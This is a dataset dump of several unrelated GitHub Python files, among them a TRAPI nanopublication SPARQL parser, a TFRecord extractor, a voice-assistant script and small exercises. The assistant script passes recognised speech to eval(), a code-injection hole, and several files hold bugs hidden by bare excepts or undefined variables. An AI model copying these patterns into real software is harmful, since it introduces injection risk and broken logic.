= \"\"\n prov_block = \"\"\n np_index_block = \"\"\n\n if in_index == \"infores:knowledge-collaboratory\":\n # TODO: filter just on nanopubs created via annotate tool, maybe use prov?\n # knowledge_source_block = f\"biolink:primary_knowledge_source <{KNOWLEDGE_PROVIDER}> ;\"\n prov_block = \"\"\"graph ?np_prov {\n ?np_assertion prov:wasQuotedFrom ?wasQuotedFrom .\n }\"\"\"\n elif in_index:\n np_index_block = f\"\"\"graph ?indexAssertionGraph {{\n {{\n <{in_index}> npx:appendsIndex* ?index .\n ?index npx:includesElement ?np .\n }} UNION {{\n <{in_index}> npx:includesElement ?np .\n }}\n }}\"\"\"\n\n sparql_query_get_nanopubs = sparql_query_get_nanopubs.replace(\n \"?_np_index_filter\", np_index_block\n )\n sparql_query_get_nanopubs = sparql_query_get_nanopubs.replace(\n \"?_prov_block\", prov_block\n )\n # else:\n # knowledge_source_block = f\"biolink:aggregator_knowledge_source <{KNOWLEDGE_PROVIDER}> ;\"\n # sparql_query_get_nanopubs = sparql_query_get_nanopubs.replace('?_knowledge_source', knowledge_source_block)\n\n for edge_id in query_graph[\"edges\"]:\n edge_props = query_graph[\"edges\"][edge_id]\n predicate_edge_id = edge_id\n subject_node_id = edge_props[\"subject\"]\n object_node_id = edge_props[\"object\"]\n\n entity_filters = \"\"\n try:\n predicate_curies = edge_props[\"predicates\"]\n if not isinstance(predicate_curies, list):\n predicate_curies = [predicate_curies]\n predicate_curies = [\"?predicate = \" + curie for curie in predicate_curies]\n predicate_curies = \" || \".join(\"?predicate = \" + predicate_curies)\n entity_filters = entity_filters + \"FILTER ( \" + predicate_curies + \" )\\n\"\n except Exception:\n pass\n\n try:\n subject_categories = query_graph[\"nodes\"][edge_props[\"subject\"]][\n \"categories\"\n ]\n if not isinstance(subject_categories, list):\n subject_categories = [subject_categories]\n subject_categories = [\"?subject_category = \" + curie for curie in subject_categories]\n subject_categories = \" || \".join(subject_categories)\n entity_filters = entity_filters + \"FILTER ( \" + subject_categories + \" )\\n\"\n except Exception:\n pass\n\n try:\n object_categories = query_graph[\"nodes\"][edge_props[\"object\"]][\"categories\"]\n if not isinstance(object_categories, list):\n object_categories = [object_categories]\n object_categories = [\"?object_category = \" + curie for curie in object_categories]\n object_categories = \" || \".join(object_categories)\n entity_filters = entity_filters + \"FILTER ( \" + object_categories + \" )\\n\"\n except Exception:\n pass\n\n # Resolve provided CURIE to the BioLink context and https://identifiers.org/CURIE:ID\n try:\n subject_curies = query_graph[\"nodes\"][edge_props[\"subject\"]][\"ids\"]\n subject_curies = [f\"?subject = <{resolve_curie(curie)}> || ?subject =<{resolve_curie_identifiersorg(curie)}>\" for curie in subject_curies]\n subject_curies = \" || \".join(subject_curies)\n entity_filters = entity_filters + \"FILTER ( \" + subject_curies + \" )\\n\"\n except Exception:\n pass\n\n try:\n object_curies = query_graph[\"nodes\"][edge_props[\"object\"]][\"ids\"]\n object_curies = [f\"?object = <{resolve_curie(curie)}> || ?object =<{resolve_curie_identifiersorg(curie)}>\" for curie in object_curies]\n object_curies = \" || \".join(object_curies)\n entity_filters = entity_filters + \"FILTER ( \" + object_curies + \" )\\n\"\n except Exception:\n pass\n sparql_query_get_nanopubs = sparql_query_get_nanopubs.replace(\n \"?_entity_filters\", entity_filters\n )\n sparql_query_get_nanopubs = sparql_query_get_nanopubs.replace(\n \"?_prov_block\", prov_block\n )\n\n # Add LIMIT to the SPARQL query if n_results provided\n if n_results:\n sparql_query_get_nanopubs = (\n sparql_query_get_nanopubs + \" LIMIT \" + str(n_results)\n )\n\n knowledge_graph = {\"nodes\": {}, \"edges\": {}}\n query_results = []\n kg_edge_count = 0\n\n if settings.DEV_MODE is True:\n print(\n f\"Running the following SPARQL query to retrieve nanopublications from {settings.NANOPUB_SPARQL_URL}\"\n )\n print(sparql_query_get_nanopubs)\n\n sparql = SPARQLWrapper(settings.NANOPUB_SPARQL_URL)\n sparql.setReturnFormat(JSON)\n sparql.setQuery(sparql_query_get_nanopubs)\n sparqlwrapper_results = sparql.query().convert()\n sparql_results = sparqlwrapper_results[\"results\"][\"bindings\"]\n\n # Check current official example of Reasoner query results: https://github.com/NCATSTranslator/ReasonerAPI/blob/master/examples/Message/simple.json\n # Now iterates the Nanopubs SPARQL query results:\n for edge_result in sparql_results:\n # print(edge_result)\n edge_uri = edge_result[\"association\"][\"value\"]\n # Create edge object in knowledge_graph\n knowledge_graph[\"edges\"][edge_uri] = {\n \"predicate\": resolve_uri_with_context(edge_result[\"predicate\"][\"value\"]),\n \"subject\": resolve_uri_with_context(edge_result[\"subject\"][\"value\"]),\n \"object\": resolve_uri_with_context(edge_result[\"object\"][\"value\"]),\n \"attributes\": [],\n \"sources\": [\n {\n \"resource_id\": \"infores:knowledge-collaboratory\",\n \"resource_role\": \"primary_knowledge_source\"\n },\n ]\n }\n if (\n \"pubkey\" in edge_result\n and \"user\" in np_users[edge_result[\"pubkey\"][\"value\"]]\n ):\n knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n {\n \"attribute_type_id\": \"biolink:author\",\n \"value\": np_users[edge_result[\"pubkey\"][\"value\"]][\"user\"][\"value\"],\n }\n )\n\n # TODO: refactor to use a list and a loop\n # extract_attributes = [\n # 'relation', 'publications', 'knowledge_source', 'label', 'provided_by',\n # 'description', 'has_population_context', 'population_has_phenotype'\n # ]\n # if \"relation\" in edge_result:\n # # knowledge_graph['edges'][edge_uri]['relation'] = resolve_uri_with_context(edge_result['relation']['value'])\n # knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n # {\n # \"attribute_type_id\": \"biolink:relation\",\n # \"value\": resolve_uri_with_context(edge_result[\"relation\"][\"value\"]),\n # }\n # )\n if \"publications\" in edge_result:\n knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n {\n \"attribute_type_id\": \"biolink:publications\",\n \"value\": resolve_uri_with_context(\n edge_result[\"publications\"][\"value\"]\n ),\n }\n )\n # NOTE: not used anymore, primary is always the knowledge collaboratory\n # if \"primary_knowledge_source\" in edge_result:\n # knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n # {\n # \"attribute_type_id\": \"biolink:primary_knowledge_source\",\n # \"value\": resolve_uri_with_context(\n # edge_result[\"primary_knowledge_source\"][\"value\"]\n # ),\n # }\n # )\n\n if \"label\" in edge_result:\n knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n {\n \"attribute_type_id\": \"biolink:name\",\n \"value\": resolve_uri_with_context(edge_result[\"label\"][\"value\"]),\n }\n )\n if \"description\" in edge_result:\n knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n {\n \"attribute_type_id\": \"biolink:description\",\n \"value\": resolve_uri_with_context(\n edge_result[\"description\"][\"value\"]\n ),\n # 'value_type_id': 'biolink:Cohort',\n }\n )\n\n if \"has_population_context\" in edge_result:\n knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n {\n \"attribute_type_id\": \"biolink:population_context_qualifier\",\n \"value\": resolve_uri_with_context(\n edge_result[\"has_population_context\"][\"value\"]\n ),\n # 'value_type_id': 'biolink:Cohort',\n }\n )\n\n if \"population_has_phenotype\" in edge_result:\n # TODO: fix the key\n knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n {\n \"attribute_type_id\": \"biolink:has_phenotype\",\n \"value\": resolve_uri_with_context(\n edge_result[\"population_has_phenotype\"][\"value\"]\n ),\n # 'value_type_id': 'biolink:Phenotype',\n }\n )\n\n # if edge_result['association_type']:\n # knowledge_graph['edges'][edge_uri]['association_type'] = resolve_uri_with_context(edge_result['association_type']['value'])\n\n if \"provided_by\" in edge_result:\n # Add provided_by attribute\n knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n {\n \"attribute_type_id\": \"biolink:provided_by\",\n \"value\": resolve_uri_with_context(\n edge_result[\"provided_by\"][\"value\"]\n ),\n # 'value_type_id': 'biolink:Agent',\n }\n )\n\n knowledge_graph[\"nodes\"][\n resolve_uri_with_context(edge_result[\"subject\"][\"value\"])\n ] = {\n \"categories\": [\n resolve_uri_with_context(edge_result[\"subject_category\"][\"value\"])\n ]\n }\n knowledge_graph[\"nodes\"][\n resolve_uri_with_context(edge_result[\"object\"][\"value\"])\n ] = {\n \"categories\": [\n resolve_uri_with_context(edge_result[\"object_category\"][\"value\"])\n ]\n }\n\n # Add the bindings to the results object\n result = {\n 'node_bindings': {},\n 'analyses': [{\n \"resource_id\": \"infores:knowledge-collaboratory\",\n \"edge_bindings\": {\n predicate_edge_id: [\n {\n \"id\": edge_uri\n }\n ]\n }\n }],\n # 'edge_bindings': {},\n }\n # result[\"edge_bindings\"][predicate_edge_id] = [{\"id\": edge_uri}]\n result[\"node_bindings\"][subject_node_id] = [\n {\"id\": resolve_uri_with_context(edge_result[\"subject\"][\"value\"])}\n ]\n result[\"node_bindings\"][object_node_id] = [\n {\"id\": resolve_uri_with_context(edge_result[\"object\"][\"value\"])}\n ]\n query_results.append(result)\n\n kg_edge_count += 1\n\n return {\n \"message\": {\n \"knowledge_graph\": knowledge_graph,\n \"query_graph\": query_graph,\n \"results\": query_results,\n },\n \"query_options\": query_options,\n \"reasoner_id\": \"infores:knowledge-collaboratory\",\n \"schema_version\": settings.TRAPI_VERSION,\n \"biolink_version\": settings.BIOLINK_VERSION,\n \"status\": \"Success\",\n # \"tool_version\": \"OpenPredict 0.1.0\",\n # \"logs\": [\n # {\n # \"code\": None,\n # \"level\": \"INFO\",\n # \"message\": \"No descendants found from Ontology KP for QNode 'n00'.\",\n # \"timestamp\": \"2023-04-05T07:24:26.646711\"\n # },\n # ]\n }\n\n\n# array_json = {\n# \"message\": {\n# \"query_graph\": {\n# \"edges\": {\n# \"e01\": {\n# \"object\": \"n1\",\n# \"predicate\": [\"biolink:treated_by\", \"biolink:treats\"],\n# \"subject\": \"n0\",\n# }\n# },\n# \"nodes\": {\n# \"n0\": {\n# \"category\": [\"biolink:ChemicalEntity\", \"biolink:Drug\"],\n# \"id\": [\"CHEBI:75725\", \"DRUGBANK:DB00394\"],\n# },\n# \"n1\": {\"category\": [\"biolink:Drug\", \"biolink:Disease\"]},\n# },\n# }\n# }\n# }\n\n## Get for rdf:type and biolink:category\n# get_metakg_edges_query = \"\"\"PREFIX rdf: \n# PREFIX rdfs: \n# PREFIX biolink: \n# PREFIX np: \n# PREFIX npx: \n# SELECT DISTINCT ?subject_category ?predicate_category ?object_category\n# WHERE {\n# graph ?np_assertion {\n# ?association\n# rdf:subject ?subject ;\n# rdf:predicate ?predicate_category ;\n# rdf:object ?object .\n# {\n# ?subject a ?subject_category .\n# ?object a ?object_category .\n# } UNION {\n# ?subject biolink:category ?subject_category .\n# ?object biolink:category ?object_category .\n# }\n# }\n# graph ?np_head {\n# ?np_uri np:hasAssertion ?np_assertion .\n# }\n# FILTER NOT EXISTS { ?creator npx:retracts ?np_uri }\n# }\"\"\"\n","repo_name":"MaastrichtU-IDS/knowledge-collaboratory","sub_path":"backend/app/trapi/reasonerapi_parser.py","file_name":"reasonerapi_parser.py","file_ext":"py","file_size_in_byte":26131,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"} +{"seq_id":"1933470141","text":"import os\nimport json\nimport pickle\nimport argparse\nimport functools\nimport numpy as np\nimport tensorflow.compat.v1 as tf\n\n# Create a description of the features.\n_FEATURE_DESCRIPTION = {\n 'position': tf.io.VarLenFeature(tf.string),\n}\n\n_FEATURE_DESCRIPTION_WITH_GLOBAL_CONTEXT = _FEATURE_DESCRIPTION.copy()\n_FEATURE_DESCRIPTION_WITH_GLOBAL_CONTEXT['step_context'] = tf.io.VarLenFeature(\n tf.string)\n\n_FEATURE_DTYPES = {\n 'position': {\n 'in': np.float32,\n 'out': tf.float32\n },\n 'step_context': {\n 'in': np.float32,\n 'out': tf.float32\n }\n}\n\n_CONTEXT_FEATURES = {\n 'key': tf.io.FixedLenFeature([], tf.int64, default_value=0),\n 'particle_type': tf.io.VarLenFeature(tf.string)\n}\n\ndef arg_parse():\n parser = argparse.ArgumentParser()\n parser.add_argument('--data-path', required=True, help='path to tf dataset', type=str)\n return parser.parse_args()\n\ndef convert_to_tensor(x, encoded_dtype):\n if len(x) == 1:\n out = np.frombuffer(x[0].numpy(), dtype=encoded_dtype)\n else:\n out = []\n for el in x:\n out.append(np.frombuffer(el.numpy(), dtype=encoded_dtype))\n out = tf.convert_to_tensor(np.array(out))\n return out\n\n\ndef parse_serialized_simulation_example(example_proto, metadata):\n \"\"\"Parses a serialized simulation tf.SequenceExample.\n\n Args:\n example_proto: A string encoding of the tf.SequenceExample proto.\n metadata: A dict of metadata for the dataset.\n\n Returns:\n context: A dict, with features that do not vary over the trajectory.\n parsed_features: A dict of tf.Tensors representing the parsed examples\n across time, where axis zero is the time axis.\n\n \"\"\"\n if 'context_mean' in metadata:\n feature_description = _FEATURE_DESCRIPTION_WITH_GLOBAL_CONTEXT\n else:\n feature_description = _FEATURE_DESCRIPTION\n context, parsed_features = tf.io.parse_single_sequence_example(\n example_proto,\n context_features=_CONTEXT_FEATURES,\n sequence_features=feature_description)\n for feature_key, item in parsed_features.items():\n convert_fn = functools.partial(\n convert_to_tensor, encoded_dtype=_FEATURE_DTYPES[feature_key]['in'])\n parsed_features[feature_key] = tf.py_function(\n convert_fn, inp=[item.values], Tout=_FEATURE_DTYPES[feature_key]['out'])\n\n # There is an extra frame at the beginning so we can calculate pos change\n # for all frames used in the paper.\n position_shape = [metadata['sequence_length'] + 1, -1, metadata['dim']]\n\n # Reshape positions to correct dim:\n parsed_features['position'] = tf.reshape(parsed_features['position'],\n position_shape)\n # Set correct shapes of the remaining tensors.\n sequence_length = metadata['sequence_length'] + 1\n if 'context_mean' in metadata:\n context_feat_len = len(metadata['context_mean'])\n parsed_features['step_context'] = tf.reshape(\n parsed_features['step_context'],\n [sequence_length, context_feat_len])\n # Decode particle type explicitly\n context['particle_type'] = tf.py_function(\n functools.partial(convert_fn, encoded_dtype=np.int64),\n inp=[context['particle_type'].values],\n Tout=[tf.int64])\n context['particle_type'] = tf.reshape(context['particle_type'], [-1])\n return context, parsed_features\n\ndef _read_metadata(data_path):\n with open(os.path.join(data_path, 'metadata.json'), 'rt') as fp:\n return json.loads(fp.read())\n\ndef input_fn(data_path, split):\n # Loads the metadata of the dataset.\n metadata = _read_metadata(data_path)\n # Create a tf.data.Dataset from the TFRecord.\n ds = tf.data.TFRecordDataset([os.path.join(data_path, f'{split}.tfrecord')])\n ds = ds.map(functools.partial(\n parse_serialized_simulation_example, metadata=metadata))\n return ds\n\ndef main():\n\n args = arg_parse()\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n metadata = _read_metadata(args.data_path)\n\n data_name = args.data_path.split('/')[-1]\n save_dir = f'./data/{data_name}'\n os.makedirs(save_dir, exist_ok=True)\n json.dump(metadata, open(os.path.join(save_dir, 'metadata.json'), 'wt'))\n\n for split in ['train', 'valid', 'test']:\n ds = input_fn(args.data_path, split=split)\n split_dir = os.path.join(save_dir, split)\n os.makedirs(split_dir, exist_ok=True)\n\n iterator = tf.data.make_one_shot_iterator(ds)\n data = iterator.get_next()\n\n i = 0\n while True:\n print(i)\n try:\n traj = sess.run(data)\n traj = {'particle_type': traj[0]['particle_type'], \n 'position': traj[1]['position']}\n pickle.dump(traj, open(os.path.join(split_dir, str(i)+'.pkl'), \"wb\"))\n i += 1\n\n except tf.errors.OutOfRangeError:\n break\n\nif __name__ == '__main__':\n main()\n","repo_name":"zhouxian/GNS-PyTorch","sub_path":"extract_tfrs.py","file_name":"extract_tfrs.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"} +{"seq_id":"3188949553","text":"#fatorial funtcion\r\n\r\nfrom sqlalchemy import false, true\r\n\r\n\r\nn = float(input(\"Please enter a number: \"))\r\n\r\nif n<0 or not(n.is_integer()):\r\n print(\"Please enter a positive number\")\r\nelif n==0 or n==1:\r\n print(\"The factorial is 1\")\r\nelse:\r\n factor = 1\r\n while(n>1):\r\n factor*=n\r\n n-=1\r\n \r\nprint(factor)\r\n \r\n \r\n\r\n \r\n \r\n \r\n ","repo_name":"Florevens/Computational---Physics","sub_path":"#factorial function (15 Points).py","file_name":"#factorial function (15 Points).py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39620606953","text":"import os\nfrom time import sleep\n\nimport colorama\nfrom colorama import Fore\nfrom tqdm import trange\n\nimport audioplayer\nimport logger\nimport recorder\n\nif __name__ == '__main__':\n colorama.init()\n logger.logo(f\"\"\"\n ██╗ █████╗ ██████╗ ██╗ ██╗██╗███████╗\n ██║██╔══██╗██╔══██╗██║ ██║██║██╔════╝\n ██║███████║██████╔╝██║ ██║██║███████╗\n ██ ██║██╔══██║██╔══██╗╚██╗ ██╔╝██║╚════██║\n ╚█████╔╝██║ ██║██║ ██║ ╚████╔╝ ██║███████║\n ╚════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═══╝ ╚═╝╚══════╝\n \"\"\")\n logger.info(f\"Jarvis made by: {Fore.BLUE}sdev\")\n logger.info(f\"Telegram: {Fore.BLUE}@olex2andr\\n\")\n logger.info(\"Jarvis Voice listener can work only with Russian Language at this moment.\\n\")\n\n for i in trange(10, desc=Fore.WHITE + '[' + Fore.LIGHTWHITE_EX + '!' + Fore.WHITE + '] Starting Voice Listener' + Fore.WHITE, bar_format='{desc} {percentage}%', leave=False):\n sleep(.1)\n\n logger.accent(\"Voice Listener started successfully. Type 'help' to see Jarvis commands.\")\n\n while True:\n recorded = recorder.record_volume().lower()\n if recorded == 'открой google':\n audioplayer.play('Открываю')\n os.startfile('D:/Chrome/Application/chrome.exe')\n else:\n symbols = {\n 'х': '*',\n 'x ': '* ', # python issue\n ' x': ' *', # python issue\n ',': '.'\n }\n\n for symbol, replaced in symbols.items():\n recorded = recorded.replace(symbol, replaced)\n\n try:\n math = round(eval(recorded), 4)\n logger.info(f\"Результат ({recorded}): {math}\")\n audioplayer.play(math)\n except:\n pass","repo_name":"isakolexandr/Jarvis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"17145121471","text":"# https://www.codewars.com/kata/586ee462d0982081bf001f07/train/python\n\ndef fillable(stock, merch, n):\n # Your code goes here.\n '''\n I'm not sure what the code does.\n I think I will try to understand what is going on.\n\n But I think this is what happening:\n - check if the key is available.\n '''\n final_price = ''\n if merch in stock.keys():\n available = stock[merch] \n if available >= n:\n final_price = True\n else:\n final_price = False\n else:\n final_price = False\n return(final_price)\n","repo_name":"detcitty/100DaysOfCode","sub_path":"python/unfinshed/thinkful.py","file_name":"thinkful.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26283473878","text":"# coding:utf-8\n# 试试用Python写个死循环:\nimport threading, multiprocessing\n\ndef loop():\n x = 0\n while True:\n x = x ^ 1\n\nfor i in range(multiprocessing.cpu_count()):\n t = threading.Thread(target=loop)\n t.start()\n\n# GIL锁:Global Interpreter Lock\n# 任何Python线程执行前,必须先获得GIL锁\n# 然后,每执行100条字节码,解释器就自动释放GIL锁,让别的线程有机会执行\n# 这个GIL全局锁实际上把所有线程的执行代码都给上了锁\n# 所以,多线程在Python中只能交替执行,即使100个线程跑在100核CPU上,也只能用到1个核。\n\n# Python解释器由于设计时有GIL全局锁,导致了多线程无法利用多核。多线程的并发在Python中就是一个美丽的梦。\n","repo_name":"BenjiKCF/chinesepythontutorial","sub_path":"chinese/deadloop.py","file_name":"deadloop.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40052682946","text":"from carbon_black.endpoints.base_endpoint import Endpoint\nfrom shared.models import Peer_Performance\nfrom datetime import datetime\n\n\nclass Peers(Endpoint):\n\n def __init__(self) -> None:\n super().__init__()\n return\n\n # returns list of dicts?\n def get(self, api_endpoint: str, transaction_id: int) -> list:\n try:\n results = self.query(\n api_endpoint, f\"SELECT * FROM Peer_Performance WHERE transaction_id = {transaction_id};\")\n get_subject_ticker = self.query(\n api_endpoint, f\"SELECT ticker FROM Transaction WHERE transaction_id = {transaction_id};\")\n self.subj_ticker = get_subject_ticker[0][0]\n return self.make_peers_model(results)\n except Exception as err:\n return {\n 'error': {\n 'peers': str(repr(err))\n }\n }\n\n def make_peers_model(self, sql_results: list) -> list:\n all_results = []\n\n for item in sql_results:\n model = Peer_Performance()\n model.data['eod_id'] = item[0]\n model.data['transaction_id'] = item[1]\n model.data['date'] = item[2].strftime(\n '%Y-%m-%d') if item[2] else None\n model.data['open'] = item[3]\n model.data['high'] = item[4]\n model.data['low'] = item[5]\n model.data['close'] = item[6]\n model.data['volume'] = item[7]\n model.data['percent_change'] = item[8]\n model.data['ticker'] = item[9]\n\n if model.data['ticker'] != self.subj_ticker:\n all_results.append(model.data)\n\n return all_results\n","repo_name":"dbbring/nostradamus","sub_path":"carbon_black/endpoints/peers.py","file_name":"peers.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"4232597223","text":"import pygame as p\nimport Floorboards\nimport ButtonPanel\nimport StatisticsPanel\n\n\ndef main():\n p.init()\n screen = p.display.set_mode((600, 600))\n clock = p.time.Clock()\n Floorboards.setup(screen)\n buttons = ButtonPanel.drawButtons(screen)\n needle_toss = False\n running = True\n count = 0\n countContact = 0\n p.display.set_caption(\"PI Estimator\")\n font = p.font.SysFont('Times New Roman', 12)\n while running:\n if needle_toss == True:\n countContact = countContact + Floorboards.needle_toss(screen)\n count = count + 1\n for event in p.event.get():\n if event.type == p.QUIT:\n running = False\n if event.type == p.MOUSEBUTTONDOWN:\n if buttons[0].collidepoint(event.pos):\n needle_toss = True\n if buttons[1].collidepoint(event.pos):\n needle_toss = False\n if buttons[2].collidepoint(event.pos):\n main()\n needle_toss = False\n ButtonPanel.drawPanel(screen)\n ButtonPanel.drawButtons(screen)\n StatisticsPanel.drawPanel(screen)\n\n text = StatisticsPanel.getStatTxt(count, countContact)\n StatisticsPanel.run_text(screen, text, (420, 20), font)\n p.display.flip()\n clock.tick(10)\n p.quit()\n\n\nmain()\n","repo_name":"shaylchetty/Pi_Estimator","sub_path":"MainDart.py","file_name":"MainDart.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"6108191813","text":"import configparser\nfrom os import path\n\n\nclass Config:\n\n fname = 'tengri.conf'\n config = configparser.ConfigParser()\n config.sections()\n\n if path.isfile(fname):\n config.read(fname)\n elif path.isfile('~/' + fname):\n config.read('~/' + fname)\n elif path.isfile('/tmp/' + fname):\n config.read('/tmp/' + fname)\n\n exclude_list = config['DEFAULT']['exclude_list']\n instance_state = config['DEFAULT']['instance_state']\n\nif __name__ == '__main__':\n config = Config()\n print(config.exclude_list, config.instance_state)\n","repo_name":"leopepe/tengri","sub_path":"tengri/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"15943108878","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\n# Read your data\ndf = pd.read_csv('insurance.csv')\n\n# Create the scatter plot\nplt.scatter(df['age'], df['charges'])\nplt.xlabel('Age')\nplt.ylabel('Charges')\nplt.title('Age vs Charges')\n\n# Show the plot\nplt.show()\n","repo_name":"maxglaser/DataScience-Portfolio","sub_path":"insurance_project/data_vis.py","file_name":"data_vis.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"38400060007","text":"import os\nimport sys\n\nfrom data import FileStream\nfrom evaluation.fgt_evaluate_prequential import FGTEvaluatePrequential\nfrom lazy.fgt_sam_knn import FGTSAMKNN\n\ncwd = os.getcwd()\nsys.path.insert(0, cwd)\n\n\n\n\"\"\"\nThis is a python program to generate evaluation results for 4 datasets with forgetting feature.\nThe aim is to compare models with the same k value and maximum window size\nthat forget different number of samples every 1000 samples seen.\nFor that purpose there are 5 forgetting values for each model: 0, 0.1, 0.25, 0.50, 0.75\n\"\"\"\n\n\"\"\"\ninitializing streams by passing csv datasets to FileStream constructor\n\"\"\"\n# stream_interchanging = FileStream('fgt-sam-knn-tests/1000-recent/interchanging-rbf/interchanging.csv')\n# stream_squares = FileStream('fgt-sam-knn-tests/1000-recent/moving_squares/squares.csv')\nstream_chessboard = FileStream('fgt-sam-knn-tests/1000-recent/chessboard/chessboard.csv')\n# stream_poker = FileStream('fgt-sam-knn-tests/1000-recent/poker/poker.csv')\n\n\"\"\"\npreparing each data stream for use\n\"\"\"\n# stream_interchanging.prepare_for_use()\n# stream_squares.prepare_for_use()\nstream_chessboard.prepare_for_use()\n# stream_poker.prepare_for_use()\n\n\ndef generate_samknn_models(k, wind_size):\n # list with number of samples to be forgotten\n n_samples_fgt = [0.1, 0.25, 0.50, 0.75]\n # initialize list of SAMKNN with model which won't have data forgotten - 25% not forget\n samknn_models = [FGTSAMKNN(n_neighbors=k, max_window_size=wind_size, fgt=False)]\n # loop to add samknn's that will have data forgotten\n for i in range(4):\n samknn_models.append(FGTSAMKNN(n_neighbors=k, max_window_size=wind_size, fgt_n_instances=n_samples_fgt[i]))\n return samknn_models\n\n\ndef generate_different_k_values_sam_knn_models(starting_k_value):\n # list that will contain lists with samknn models, each with its own 'k' values\n samknn_models_nested = []\n # loop to append to samknn_models_nested samknn models with k = [3, 5]\n for j in range(starting_k_value, 4, 2):\n samknn_models_nested.append(generate_samknn_models(j, 5000))\n return samknn_models_nested\n\n\ndef evaluate(dataset_name, stream, starting_k_value=3):\n samknn_list = generate_different_k_values_sam_knn_models(starting_k_value)\n for i in range(len(samknn_list)):\n file_name = 'results_k=' + str(samknn_list[i][0].n_neighbors) + '_ws=' + str(samknn_list[i][0].max_wind_size)\n evaluator = FGTEvaluatePrequential(max_samples=2000000,\n show_plot=False,\n pretrain_size=samknn_list[i][0].n_neighbors,\n n_wait=100,\n metrics=['accuracy'],\n output_file='fgt-sam-knn-tests/1000-recent/' + dataset_name + '/' + file_name + '.csv',\n fgt_freq=1000)\n\n evaluator.evaluate(stream=stream, model=samknn_list[i],\n image_name='fgt-sam-knn-tests/' + dataset_name + '/' + file_name,\n model_names=['0', '0.1', '0.25', '0.5', '0.75'])\n\n\n\"\"\"\ngenerate results for each dataset\n\"\"\"\n# evaluate('interchanging', stream_interchanging)\n# evaluate('squares', stream_squares)\nevaluate('chessboard', stream_chessboard)\n# evaluate('poker', stream_poker)\n","repo_name":"ariadnepinheiro/research-project-stream-learning","sub_path":"lazy/generate_results_for_fgt_sam_knn.py","file_name":"generate_results_for_fgt_sam_knn.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"7294064698","text":"import numpy as np\nfrom shapely.geometry import Point, Polygon, MultiPolygon\n\nfrom geometry import rotation_matrix_from_src_dest_vecs\n\nfrom polyhedra import (\n icosahedron,\n truncated_icosahedron,\n icosahedron_face_transform,\n truncated_icosahedron_face_transform,\n)\n\n# a \"map projection class\" should be capable of accepting a set of parameters, a list of lat-lon shapes,\n# and returning a corresponding list of shapes in the output/projected space.\n# for conventional planar projections, this is a simpler concept, because the output space is simply a 2D plane.\n# dymaxion projections for CNC introduce several complications:\n# - \"interruptions\" can cause input shapes to result in multiple output shapes,\n# so the input is a list of shapes but the output is a list of lists of shapes.\n# (https://en.wikipedia.org/wiki/Interruption_(map_projection))\n# - there are two output spaces:\n# - the surface of the polyhedron\n# - the 2d plane after unfolding the polyhedron\n# - the unfolding step is itself nontrivial (see polyhedra.py)\n# - any shape in the 2d plane that crosses a polyhedron face boundary\n# (even if not interrupted in the 2d layout after unfolding)\n# needs to be represented as a closed loop that coincides with that boundary.\n# this is the CNC requirement, and this is what necessitates this \"partial-identity azimuthal\"\n# intermediate \"warp\" projection.\n\n\"\"\"\nDymaxionProjection provides methods to compute a variety of dymaxion-like projections,\nfrom the sphere to a polyhedron.\n\ninit methods:\n __init__ accepts a polyhedron, either by name, or by literally specified vertices, edges, and faces\n _init_from_name and _init_from_data handle the actual initialization of these\n _init_2d calculates and caches some values that are used to transform faces, and their corresponding projected shapes, to the final 2d layout\n\nsimple API methods:\n set_projection\n project\n\nprojection implementations:\n\n project_predistort_90\n project_predistort_45\n project_simple_closed - returns closed-loop shapes in the XY plane, in proper unrolled-polyhedron position+orientation. should be called once for each (face, shape) pair. \"simple\" indicates \"no predistortion\"\n project_simple_archimedean_face\n project_simple_archimedean\n project_simple_platonic\n\nazimuthal_warp_projection - helper function for project_simple_closed\n\n\n\n\"\"\"\n\n\nclass DymaxionProjection(object):\n # designed to work for a regular icosahedron\n # should work for any platonic solid, any archimedean solid\n # and also another class of polyhedra that i don't know a name for:\n # those that are equivalent to spherical voronoi diagrams - that is,\n # any point on a face is closer to the central bisector of that face,\n # than to the central bisector of any other face.\n # that assumes \"central bisector\" is well-defined.\n # TODO: research this \"voronoi polyhedron\" concept\n def __init__(self, *args, **kwargs):\n if 'polyhedron' in kwargs:\n self._init_from_name(**kwargs)\n elif 'vertices' in kwargs and 'edges' in kwargs and 'faces' in kwargs:\n self._init_from_data(**kwargs)\n else:\n print('Dymaxion initialization error')\n import ipdb; 